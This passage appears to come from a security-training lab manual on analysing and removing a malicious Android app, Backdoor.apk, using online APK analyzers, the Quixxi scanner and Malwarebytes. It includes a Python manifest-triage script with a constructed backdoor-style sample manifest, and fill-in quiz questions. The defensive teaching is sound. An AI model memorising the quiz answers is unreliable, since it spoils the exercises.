In Chrome, type https://www.sisik.eu/apk-tool in the address bar and press Enter.
The Sixo Online APK Analyzer webpage loads, as shown in the screenshot.
If a cookie notification pop-up appears, click Got it!
Click the Drop APK here or click to select file field to upload an APK file from the device.
Sixo Online APK Analyzer allows you to analyze various details about Android APK files. It can decompile binary XML files and resources.
Screenshot
In the Choose an action pop-up, click Files.
If Chrome pop-up appears, click ALLOW.
Screenshot
The Downloads screen appears; double-click the Backdoor.apk file.
If you find yourself in a folder called Recent, navigate to the Downloads folder by clicking the ellipsis icon in the top-left corner.
Screenshot
The browser window reappears with the information about the uploaded file (Backdoor.apk), as shown in the screenshot.
Screenshot
Scroll down to the Requested Permissions section to view information regarding the app’s requested permissions.
When an app wants to access protected resources or device capabilities, it must request permission to do so. Normal permissions are granted automatically at install time; dangerous permissions (SMS, contacts, location, microphone, camera, and similar) must be confirmed by the user at runtime on Android 6.0 and later. All requested permissions are declared in the app’s AndroidManifest.xml file.
Screenshot
Scroll down to the AndroidManifest.xml section, which consists of essential information about the APK file.
The manifest file contains important information about the app that is used by development tools, the Android system, and app stores. It contains the app’s package name, version information, declarations of app components, requested permissions, and other important data. It is serialized into a binary XML format and bundled inside the app’s APK file.
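As an added example (not part of the lab, and not code from Sixo or Quixxi), the following Python script performs the same manifest triage offline: it lists the requested permissions, singles out the runtime-prompted dangerous ones, and reports the misconfigurations (debuggable build, backup left enabled, cleartext traffic allowed, exported components without a guarding permission) that a scanner such as the one in Task 2 presents as findings. It assumes the manifest has already been decoded to text with a tool such as apktool, since the copy inside the APK is binary XML. The manifest embedded below is constructed to resemble a reverse-shell backdoor; it is not taken from Backdoor.apk.

```python
"""Triage a decoded AndroidManifest.xml the way an APK analyzer does:
list requested permissions, flag the 'dangerous' (runtime-prompted) ones,
and report the classic misconfigurations.

Added example, not part of the lab or of the Sixo/Quixxi tools. Assumes the
manifest has already been decoded to text (e.g. apktool d app.apk); the
binary XML inside an APK cannot be fed to ElementTree directly.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Subset of permissions Android assigns protectionLevel "dangerous".
DANGEROUS = {
    "android.permission.SEND_SMS", "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS", "android.permission.READ_CONTACTS",
    "android.permission.WRITE_CONTACTS", "android.permission.READ_CALL_LOG",
    "android.permission.WRITE_CALL_LOG", "android.permission.CALL_PHONE",
    "android.permission.READ_PHONE_STATE", "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA", "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.ACCESS_COARSE_LOCATION",
    "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.WRITE_EXTERNAL_STORAGE",
}


def _attr(element, name):
    """Read an android:-namespaced attribute (None if absent)."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def _is_launcher(component):
    """The MAIN/LAUNCHER activity is exported by design; do not flag it."""
    for action in component.iter("action"):
        if _attr(action, "name") == "android.intent.action.MAIN":
            return True
    return False


def analyze_manifest(xml_text: str) -> dict:
    root = ET.fromstring(xml_text)
    perms = [_attr(el, "name") for el in root.iter("uses-permission")]
    report = {
        "package": root.get("package"),
        "permissions": perms,
        "dangerous": sorted(p for p in perms if p in DANGEROUS),
        "findings": [],
    }
    app = root.find("application")
    if app is None:
        return report
    if _attr(app, "debuggable") == "true":
        report["findings"].append("debuggable")
    if _attr(app, "allowBackup") != "false":   # the platform default is true
        report["findings"].append("backup-allowed")
    if _attr(app, "usesCleartextTraffic") == "true":
        report["findings"].append("cleartext-traffic")
    for tag in ("activity", "service", "receiver", "provider"):
        for comp in app.iter(tag):
            exported = _attr(comp, "exported")
            # A component with an intent-filter and no explicit android:exported
            # is reachable by other apps on older targets.
            implicit = exported is None and comp.find("intent-filter") is not None
            if (exported == "true" or implicit) and _attr(comp, "permission") is None \
                    and not _is_launcher(comp):
                report["findings"].append("exported-unprotected:%s" % _attr(comp, "name"))
    return report


# Constructed sample, modeled on a reverse-shell backdoor; not from Backdoor.apk.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.backdoor" android:versionCode="1">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="MainActivity" android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".MainService" android:exported="true"/>
    <receiver android:name=".MainBroadcastReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

if __name__ == "__main__":
    result = analyze_manifest(SAMPLE_MANIFEST)
    print("package:", result["package"])
    print("dangerous permissions:", ", ".join(result["dangerous"]))
    print("findings:", ", ".join(result["findings"]))
```

The permission list alone is the strongest signal for a payload like the one built in Lab 1: an app labelled MainActivity with no user-facing purpose that asks for SMS, microphone, camera, contacts, location and boot-time start has no legitimate reason to, which is exactly what the Requested Permissions section of the online analyzer lets you eyeball.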
Screenshot
You can also scroll down to view information about the app’s APK Signature, App Source Code, etc.
This concludes the demonstration of analyzing a malicious app using online Android analyzers.
You can also use other online Android analyzers such as SandDroid (http://sanddroid.xjtu.edu.cn), Apktool (http://www.javadecompilers.com), and Apprisk Scanner to analyze malicious applications.
Close all open windows and document all the acquired information.
Question 2.1.1:
The malicious file that is being analyzed in this task is_____________
Task 2: Analyze a Malicious App using Quixxi Vulnerability Scanner
Quixxi is an intelligent and integrated end-to-end mobile app security solution. This powerful tool is for developers to protect and monitor any mobile apps in minutes.
In this task, we will analyze the malicious app using Quixxi’s free mobile app vulnerability scanner.
In the Android machine, click the Google Chrome browser icon on the Home screen to launch Chrome.
In Chrome, type https://vulnerabilitytest.quixxi.com/#/ in the address bar and press Enter.
The Quixxi website loads; click the Drag and drop or click here to scan your app field.
Screenshot
When the Choose an action pop-up appears, click Files.
The Downloads screen appears; double-click Backdoor.apk.
Quixxi starts scanning the selected APK file (Backdoor.apk) for vulnerabilities.
Screenshot
After the scan finishes, the result appears under the Vulnerability Scan Report: A Summary section, listing the number of discovered vulnerabilities, risk threats, etc., as shown in the screenshot.
Screenshot
Click to expand Permissions Used node to view the permissions.
Screenshot
Scroll down and click to expand the CERTIFICATION INFORMATION node to view the signing certificate details.
Screenshot
Scroll down further to view the OWASP information, such as Issue, Severity, Assessment Status, CWE, Exploits, etc.
Screenshot
Screenshot
Screenshot
You can scroll down and click the GET FULL REPORT button to generate a full report.
This concludes the demonstration of how to analyze a malicious app using the Quixxi vulnerability scanner.
You can also use other Android vulnerability scanners such as X-Ray (https://duo.com), Vulners Scanner (https://play.google.com), Shellshock Vulnerability Scan (https://play.google.com), Yaazhini (https://www.vegabird.com), and Quick Android Review Kit (QARK) (https://github.com) to analyze malicious apps for vulnerabilities.
Close all open windows and document all the acquired information.
Question 2.2.1:
Which web browser is used in this task to reach the Quixxi website?
Task 3: Secure Android Devices from Malicious Apps using Malwarebytes Security
Malwarebytes is an antimalware mobile tool that provides protection against malware, ransomware, and other growing threats to Android devices. It blocks, detects, and removes adware and malware; conducts privacy audits for all apps; and ensures safer browsing.
In this task, we will secure an Android device from malicious applications using Malwarebytes Security.
Click Android to switch to the Android machine.
Click the Commands icon in the top-left corner of the screen and navigate to Power –> Reset/Reboot machine.
If Reset/Reboot machine pop-up appears, click Yes to proceed.
Screenshot
After the machine reboots, on the Home screen, swipe from right to left to navigate to the second page of the Home screen.
Screenshot
On the second page of the Home screen, click the Malwarebytes app.
Screenshot
Malwarebytes Security initializes. A Let’s get you started message appears; click the Get started button to proceed.
Screenshot
In the permissions window, click Give permission.
Screenshot
A system pop-up appears, asking for permission; click ALLOW.
Screenshot
If the trial version wizard appears, click the Start Premium trial button to start the free premium trial of Malwarebytes Security.
The Your device is safe screen loads; click the Scan now button to start scanning the system.
Screenshot
Malwarebytes Security begins a security scan, as shown in the screenshot.
Screenshot
After the scan completes, a Scan finished message appears; click View scan results to see the results.
Screenshot
A Threats screen appears. This will show you all the malware (if any) found on your device.
Here, the malware found is the malicious file Backdoor.apk.
Click the Remove selected button to remove the detected malware from your device.
Screenshot
A confirmation pop-up appears; click OK to confirm the removal of the malware.
Screenshot
The Malwarebytes Scanner screen appears, notifying you that All items have been dealt with!
Screenshot
Click Scan after update in the lower section of the Scanner window under Previous scans to view details of the scan.
Screenshot
The Scanning history screen appears, displaying the deleted malicious file, as shown in the screenshot.
Screenshot
This concludes the demonstration of how to secure Android devices from malicious apps using Malwarebytes Security.
You can use other mobile antivirus and anti-spyware tools such as AntiSpy Mobile (https://antispymobile.com), Spyware Detector – Anti Spy Privacy Scanner (https://play.google.com), iAmNotified – Anti Spy System (https://iamnotified.com), and Privacy Scanner (AntiSpy) Free (https://play.google.com) to secure mobile devices from malicious apps.
Close all open windows and document all the acquired information.
Question 2.3.1:
The name of the malware found in this task using Malwarebytes is______________